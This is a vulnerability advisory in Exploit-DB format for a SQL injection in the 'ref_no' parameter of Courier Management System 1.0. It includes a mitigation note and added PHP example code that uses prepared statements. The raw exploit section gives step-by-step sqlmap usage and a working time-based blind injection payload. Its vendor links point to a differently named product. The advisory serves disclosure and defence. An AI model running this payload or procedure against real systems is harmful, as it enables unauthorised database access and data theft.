Vendor: Courier Management System
By: Zhaiyi (Zeo)
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Courier Management System
Affected Version From: Version 1
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2020

Courier Management System 1.0 – ‘ref_no’ SQL Injection

The 'ref_no' parameter in the Courier Management System 1.0 is vulnerable to SQL Injection. By manipulating the 'ref_no' parameter in the request to the '/ajax.php?action=save_branch' page, an attacker can execute arbitrary SQL queries and potentially retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries or prepared statements to handle user input and ensure that input is properly validated and sanitized before being used in SQL queries.
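
The mitigation above, sketched as an added example (not code from the application or from the advisory author): a handler that validates `ref_no` against an allowlist and passes it only as a bound parameter. The table and column names, the `ref_no` format and the helper names are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline; with MySQLi the same pattern uses `prepare()` and `bind_param()`.

```php
<?php
// Added example, not the application's code. Table/column names (branches,
// ref_no, street) and the ref_no format are assumptions for illustration.
declare(strict_types=1);

function open_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE branches (id INTEGER PRIMARY KEY, ref_no TEXT UNIQUE, street TEXT)');
    return $db;
}

// Allowlist validation: assumed format of letters, digits and dashes, 1-32 chars.
function valid_ref_no($ref_no): bool {
    // is_string() also rejects array-valued parameters such as ref_no[]=x.
    return is_string($ref_no) && preg_match('/\A[A-Za-z0-9-]{1,32}\z/', $ref_no) === 1;
}

// Hardened handler: the SQL text is fixed and user input travels only as
// bound parameters, so a quote in the value cannot end the string literal.
function save_branch(PDO $db, array $post): bool {
    $ref_no = $post['ref_no'] ?? '';
    $street = is_string($post['street'] ?? null) ? $post['street'] : '';
    if (!valid_ref_no($ref_no)) {
        return false; // reject outright instead of trying to "clean" the value
    }
    $stmt = $db->prepare('INSERT INTO branches (ref_no, street) VALUES (:ref_no, :street)');
    return $stmt->execute([':ref_no' => $ref_no, ':street' => $street]);
}

$db = open_demo_db();
// The ref_no value reported in the advisory, used here as test input.
$probe = "123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst";

// A well-formed reference number passes validation; the probe does not.
var_dump(save_branch($db, ['ref_no' => 'BR-0001', 'street' => 'Main St']));
var_dump(save_branch($db, ['ref_no' => $probe, 'street' => 'x']));

// With validation skipped, binding still keeps the probe inert: it is stored
// as an ordinary string and the statement's structure does not change.
$stmt = $db->prepare('INSERT INTO branches (ref_no, street) VALUES (?, ?)');
$stmt->execute([$probe, 'x']);
$q = $db->prepare('SELECT COUNT(*) FROM branches WHERE ref_no = ?');
$q->execute([$probe]);
var_dump((int)$q->fetchColumn() === 1);
```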

Exploit-DB raw data:

# Exploit Title: Courier Management System 1.0 - 'ref_no' SQL Injection
# Exploit Author: Zhaiyi (Zeo)
# Date: 2020-12-11
# Vendor Homepage: https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14615&title=Task+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Affected Version: Version 1
# Category: Web Application

Step 1. Log into application with credentials
Step 2. Click on Branch
Step 3. Select New Branch http://127.0.0.1/index.php?page=new_branch
Step 4. Fill the form, click on save
Step 5. Capture the request of the "/ajax.php?action=save_branch" page in Burp Suite
Step 6. Save request and run sqlmap on request file using command "sqlmap -r request --time-sec=5 --dbs"
Step 7. This will inject successfully and you will have an information disclosure of all databases contents

---
Parameter: ref_no (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: ref_no=123' AND (SELECT 5575 FROM (SELECT(SLEEP(5)))ngIo) AND 'knst'='knst
---